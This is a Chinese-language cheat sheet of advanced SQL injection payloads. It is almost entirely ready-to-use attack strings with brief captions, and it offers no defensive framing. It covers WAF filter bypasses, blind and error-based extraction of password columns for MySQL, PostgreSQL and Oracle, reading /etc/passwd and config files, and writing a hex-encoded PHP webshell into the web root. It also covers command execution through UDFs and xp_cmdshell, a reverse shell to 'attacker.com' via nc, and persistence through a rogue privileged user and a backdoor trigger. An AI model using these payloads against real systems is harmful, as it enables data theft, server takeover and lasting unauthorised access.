中高级SQL注入语句

一、绕过WAF/过滤

' UNiON/**/SeLeCT/**/1,2,3--

注释符绕过空格过滤

' AND/**/1=0/**/UNION/**/SELECT/**/1,2,3--

混合注释符和大小写绕过

'/*!50000UNION*//*!50000SELECT*/1,2,3--

MySQL版本号注释绕过

' AND~1+1=2--

位运算和算术运算绕过

' XOR (SELECT 1 FROM (SELECT SLEEP(5))a)--

XOR运算和子查询结合

二、高级盲注技术

' AND (SELECT MID(@@version,1,1)='5')--

使用MID函数进行版本判断

' AND (SELECT ORD(MID((SELECT password FROM users LIMIT 1),1,1)))>50--

ORD函数逐字符猜解

' AND (SELECT BIN(ASCII(SUBSTR((SELECT password FROM users LIMIT 1),1,1)))&1)--

二进制位运算盲注

' AND (SELECT POSITION('a' IN (SELECT password FROM users LIMIT 1)))>0--

POSITION函数盲注

' AND (SELECT CHAR_LENGTH((SELECT password FROM users LIMIT 1)))>5--

长度判断盲注

三、非常规报错注入

' AND GTID_SUBSET(CONCAT(0x7e,(SELECT password FROM users LIMIT 1),0x7e),1)--

MySQL GTID函数报错注入

' AND ST_LatFromGeoHash((SELECT database()))--

地理空间函数报错注入

' AND NAME_CONST((SELECT password FROM users LIMIT 1),1)--

NAME_CONST函数报错注入

' AND (SELECT 1 FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))x)--

重复NAME_CONST报错

' AND EXP(~(SELECT*FROM(SELECT USER())a))--

指数函数溢出报错

四、堆叠查询高级利用

'; SET @sql=0x73656c6563742031; PREPARE stmt FROM @sql; EXECUTE stmt;--

十六进制编码的预处理语句

'; DELIMITER //; CREATE PROCEDURE test() BEGIN SELECT 1; END//; CALL test()//--

创建存储过程执行

'; HANDLER users OPEN; HANDLER users READ FIRST; HANDLER users CLOSE;--

使用HANDLER命令直接读取表

'; CREATE TEMPORARY TABLE temp AS SELECT * FROM users; SELECT * FROM temp;--

创建临时表中转数据

'; LOCK TABLES users READ; UNLOCK TABLES;--

表锁定操作

五、数据库特定高级技巧

MySQL

' UNION SELECT 1,(SELECT(@)FROM(SELECT(@:=0x00),(SELECT(@)FROM(users)WHERE(@)IN(@:=CONCAT(@,0x0a,username,0x3a,password))))a),3-- 变量赋值绕过SELECT限制

' AND (SELECT * FROM (SELECT NAME_CONST((SELECT password FROM users LIMIT 1),1),NAME_CONST((SELECT password FROM users LIMIT 1),1))x)--

重复列名报错

' UNION SELECT 1,LOAD_FILE(0x2f6574632f706173737764),3--

十六进制文件路径读取

' AND (SELECT BINARY(password) FROM users LIMIT 1)='admin'--

二进制精确匹配

---

PostgreSQL

'::text UNION SELECT 1,2,3--

类型转换绕过

' AND (SELECT array_to_string(array_agg(column_name),',') FROM information_schema.columns) LIKE '%pass%'--

数组聚合查询

' AND (SELECT convert_from(decode('YWRtaW4=','base64'),'utf-8'))='admin'--

Base64解码绕过

' AND (SELECT has_table_privilege('users','select'))--

权限检查盲注

---

Oracle

' AND (SELECT LISTAGG(column_name,',') WITHIN GROUP (ORDER BY column_name) FROM all_tab_columns) LIKE '%PASS%'-- LISTAGG函数数据聚合

' AND (SELECT DBMS_LOB.SUBSTR((SELECT password FROM users),1,1) FROM DUAL)='a'--

LOB对象处理

' AND (SELECT RAWTOHEX(UTL_RAW.CAST_TO_RAW((SELECT password FROM users))) FROM DUAL) LIKE '61%'--

RAW类型转换

六、文件操作高级技巧

' UNION SELECT 1,LOAD_FILE('/var/www/html/config.php'),3 INTO DUMPFILE '/tmp/config.txt'--

读取并导出文件

' UNION SELECT 1,0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e,3 INTO OUTFILE '/var/www/html/shell.php'--

十六进制写入Webshell

' AND (SELECT COUNT(*) FROM mysql.user WHERE file_priv='Y')>0--

检查文件权限

' UNION SELECT 1,hex(load_file('/etc/passwd')),3--

十六进制格式读取文件

七、系统命令执行

'; SELECT sys_eval('id')--

UDF系统命令执行

'; CREATE FUNCTION sys_exec RETURNS string SONAME 'udf.so'; SELECT sys_exec('whoami')--

创建UDF执行命令

'; EXEC xp_cmdshell 'whoami'--

MSSQL命令执行

'; COPY (SELECT '') TO PROGRAM 'nc -e /bin/sh attacker.com 4444'--

PostgreSQL反向shell

八、权限提升和持久化

'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'password'--

创建高权限用户

; INSERT INTO mysql.func (name, ret, dl, type) VALUES ('sys_exec', 2, 'udf.so', 'function')--

插入UDF函数定义

'; CREATE TRIGGER backdoor BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT 1; END--

创建后门触发器

'; UPDATE mysql.user SET plugin='mysql_native_password' WHERE user='root'--

修改认证插件

九、网络操作和信息收集

' AND (SELECT SUBSTRING_INDEX(USER(),'@',-1))='localhost'--

获取连接来源主机

' UNION SELECT 1,@@hostname,@@version_compile_os,4--

获取系统信息

'; SELECT * FROM information_schema.PROCESSLIST--

查看当前连接进程